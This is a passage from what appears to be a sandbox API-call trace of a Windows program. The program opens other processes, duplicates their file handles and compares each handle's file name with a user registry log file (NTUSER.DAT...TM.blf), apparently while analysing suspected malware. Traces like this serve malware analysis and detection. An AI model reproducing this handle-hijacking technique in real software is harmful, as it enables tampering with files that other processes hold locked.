_Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.589] CloseHandle (hObject=0x194) returned 1 [0162.589] CloseHandle (hObject=0x1e8) returned 1 [0162.589] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.589] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.590] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.591] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.591] CloseHandle (hObject=0x1e4) returned 1 [0162.591] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkProfile%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.591] CloseHandle (hObject=0x194) returned 1 [0162.591] CloseHandle (hObject=0x1e8) returned 1 [0162.591] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.591] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.591] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.642] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.645] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.645] CloseHandle (hObject=0x1e4) returned 1 [0162.645] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.645] CloseHandle (hObject=0x194) returned 1 [0162.646] CloseHandle (hObject=0x1e8) returned 1 [0162.646] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.646] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.646] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.648] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.648] CloseHandle (hObject=0x1e4) returned 1 [0162.649] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.649] CloseHandle (hObject=0x194) returned 1 [0162.649] CloseHandle (hObject=0x1e8) returned 1 [0162.649] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.649] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x62c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.649] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.650] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.651] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.651] CloseHandle (hObject=0x1e4) returned 1 [0162.652] CloseHandle (hObject=0x194) returned 1 [0162.652] CloseHandle (hObject=0x1e8) returned 1 [0162.652] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.652] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x630, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.652] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.653] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.653] CloseHandle (hObject=0x1e4) returned 1 [0162.654] _wcsicmp (_Str1="\\wuaueng.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.654] CloseHandle (hObject=0x194) returned 1 [0162.654] CloseHandle (hObject=0x1e8) returned 1 [0162.654] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.654] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x634, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.654] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.655] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.656] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.656] CloseHandle (hObject=0x1e4) returned 1 [0162.656] CloseHandle (hObject=0x194) returned 1 [0162.656] CloseHandle (hObject=0x1e8) returned 1 [0162.656] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.656] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x64c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.657] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.658] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.658] CloseHandle (hObject=0x1e4) returned 1 [0162.658] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.658] CloseHandle (hObject=0x194) returned 1 [0162.658] CloseHandle (hObject=0x1e8) returned 1 [0162.658] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.658] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x650, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.659] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.660] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.660] CloseHandle (hObject=0x1e4) returned 1 [0162.660] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.660] CloseHandle (hObject=0x194) returned 1 [0162.660] CloseHandle (hObject=0x1e8) returned 1 [0162.660] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.660] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x67c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.660] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.661] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.661] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.662] CloseHandle (hObject=0x1e4) returned 1 [0162.662] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.662] CloseHandle (hObject=0x194) returned 1 [0162.662] CloseHandle (hObject=0x1e8) returned 1 [0162.662] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.662] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.663] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.664] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.664] CloseHandle (hObject=0x1e4) returned 1 [0162.664] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.664] CloseHandle (hObject=0x194) returned 1 [0162.664] CloseHandle (hObject=0x1e8) returned 1 [0162.664] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.664] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.665] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.666] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.666] CloseHandle (hObject=0x1e4) returned 1 [0162.666] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.666] CloseHandle (hObject=0x194) returned 1 [0162.666] CloseHandle (hObject=0x1e8) returned 1 [0162.666] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.667] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.670] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.672] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.672] CloseHandle (hObject=0x1e4) returned 1 [0162.673] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.673] CloseHandle (hObject=0x194) returned 1 [0162.673] CloseHandle (hObject=0x1e8) returned 1 [0162.673] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.673] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x730, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.674] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.676] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.677] CloseHandle (hObject=0x1e4) returned 1 [0162.677] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.677] CloseHandle (hObject=0x194) returned 1 [0162.677] CloseHandle (hObject=0x1e8) returned 1 [0162.677] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.677] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x73c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.678] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.679] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.680] CloseHandle (hObject=0x1e4) returned 1 [0162.680] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.680] CloseHandle (hObject=0x194) returned 1 [0162.680] CloseHandle (hObject=0x1e8) returned 1 [0162.680] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.680] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.681] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.681] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.681] CloseHandle (hObject=0x1e4) returned 1 [0162.682] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.682] CloseHandle (hObject=0x194) returned 1 [0162.682] CloseHandle (hObject=0x1e8) returned 1 [0162.682] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.682] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x75c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.682] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.683] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.683] CloseHandle (hObject=0x1e4) returned 1 [0162.683] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.683] CloseHandle (hObject=0x194) returned 1 [0162.683] CloseHandle (hObject=0x1e8) returned 1 [0162.684] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.684] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.685] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.686] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.686] CloseHandle (hObject=0x1e4) returned 1 [0162.687] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.687] CloseHandle (hObject=0x194) returned 1 [0162.687] CloseHandle (hObject=0x1e8) returned 1 [0162.687] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.687] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.687] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.687] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.688] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.688] CloseHandle (hObject=0x1e4) returned 1 [0162.688] CloseHandle (hObject=0x194) returned 1 [0162.688] CloseHandle (hObject=0x1e8) returned 1 [0162.688] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.688] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.689] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.690] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.690] CloseHandle (hObject=0x1e4) returned 1 [0162.690] CloseHandle (hObject=0x194) returned 1 [0162.690] CloseHandle (hObject=0x1e8) returned 1 [0162.690] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.690] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.691] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.692] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.692] CloseHandle (hObject=0x1e4) returned 1 [0162.692] CloseHandle (hObject=0x194) returned 1 [0162.692] CloseHandle (hObject=0x1e8) returned 1 [0162.692] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.692] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.693] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.694] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.694] CloseHandle (hObject=0x1e4) returned 1 [0162.694] CloseHandle (hObject=0x194) returned 1 [0162.694] CloseHandle (hObject=0x1e8) returned 1 [0162.694] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.694] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.694] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.695] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.700] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.700] CloseHandle (hObject=0x1e4) returned 1 [0162.700] _wcsicmp (_Str1="\\.", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -64 [0162.700] CloseHandle (hObject=0x194) returned 1 [0162.700] CloseHandle (hObject=0x1e8) returned 1 [0162.700] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.700] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.701] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.702] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.703] CloseHandle (hObject=0x1e4) returned 1 [0162.703] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.703] CloseHandle (hObject=0x194) returned 1 [0162.703] CloseHandle (hObject=0x1e8) returned 1 [0162.703] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.703] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.703] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.704] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.704] CloseHandle (hObject=0x1e4) returned 1 [0162.704] _wcsicmp (_Str1="\\$ObjId", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -74 [0162.704] CloseHandle (hObject=0x194) returned 1 [0162.704] CloseHandle (hObject=0x1e8) returned 1 [0162.704] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.704] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.705] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.710] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.710] CloseHandle (hObject=0x1e4) returned 1 [0162.710] CloseHandle (hObject=0x194) returned 1 [0162.710] CloseHandle (hObject=0x1e8) returned 1 [0162.711] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.711] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x468, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 